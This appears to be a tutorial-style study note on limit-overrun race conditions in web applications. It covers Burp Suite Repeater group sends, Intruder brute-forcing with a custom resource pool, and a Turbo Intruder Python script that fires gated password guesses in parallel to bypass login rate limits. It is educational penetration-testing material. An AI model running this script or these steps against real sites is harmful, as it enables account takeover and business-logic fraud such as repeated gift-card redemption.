Limit overrun race conditions

Limit Overrun Race Conditions

The most well-known type of race condition enables you to exceed some kind of limit imposed by the business logic of the application.

There are many variations of this kind of attack, including:

• Redeeming a gift card multiple times

• Rating a product multiple times

• Withdrawing or transferring cash in excess of your account balance

• Reusing a single CAPTCHA solution

• Bypassing an anti-brute-force rate limit

Limit overruns are a subtype of so-called "time-of-check to time-of-use" (TOCTOU) flaws.

Detecting and Exploiting Limit Overrun (Repeater)

The process of detecting and exploiting limit overrun race conditions is relatively simple. In high-level terms, all you need to do is:

1. Identify a single-use or rate-limited endpoint that has some kind of security impact or other useful purpose.

2. Issue multiple requests to this endpoint in quick succession to see if you can overrun this limit.

Sending a Group of Requests (Repeater)

• Right click the request and send it to repeater

• In the repeater tab right click the request and agin send it to repater or you can use ctrl+r (You have to create 15 to 20 requests)

• Now, click on the + icon besides the last request tab

• Select Create tab group

• Select all the requests

• Give it a name

• Select a color

• Click on Create

• Expand the send button

• Select Send group in parallel option

• Click on the Send group (parallel button)

Bypassing Rate Limits (Anti Bruteforce Mechanism)

• Send the login request to the intruder

• Set the payload position to password field

• In the payloads tab enter some default passwords

• Switch to the Resource pool tab

• Select Custom resource pool option

• Click on Start attack button

• Look for the 302 response

Using Turbo Intruder

• Send the post request to the repeater

• Right click on the request in the repeater

• Click Extensions -> send to Turbo Intruder

• replace the password with %s symbol in the request window

• paste the below code in the python scripts window

def queueRequests(target, wordlists):

    # if the target supports HTTP/2, use engine=Engine.BURP2 to trigger the single-packet attack
    # if they only support HTTP/1, use Engine.THREADED or Engine.BURP instead
    # for more information, check out https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )

    # the 'gate' argument withholds part of each request until openGate is invoked
    # if you see a negative timestamp, the server responded before the request was complete

    passwords = wordlists.clipboard
    
    
    for password in passwords:
        engine.queue(target.req, password, gate='1')

    # once every 'race1' tagged request has been queued
    # invoke engine.openGate() to send them in sync
    engine.openGate('1')


def handleResponse(req, interesting):
    table.add(req)

• Click on the Attack button

• Look for 302 status code

REFERENCES

• https://portswigger.net/burp/documentation/desktop/tools/repeater/send-group#sending-requests-in-parallel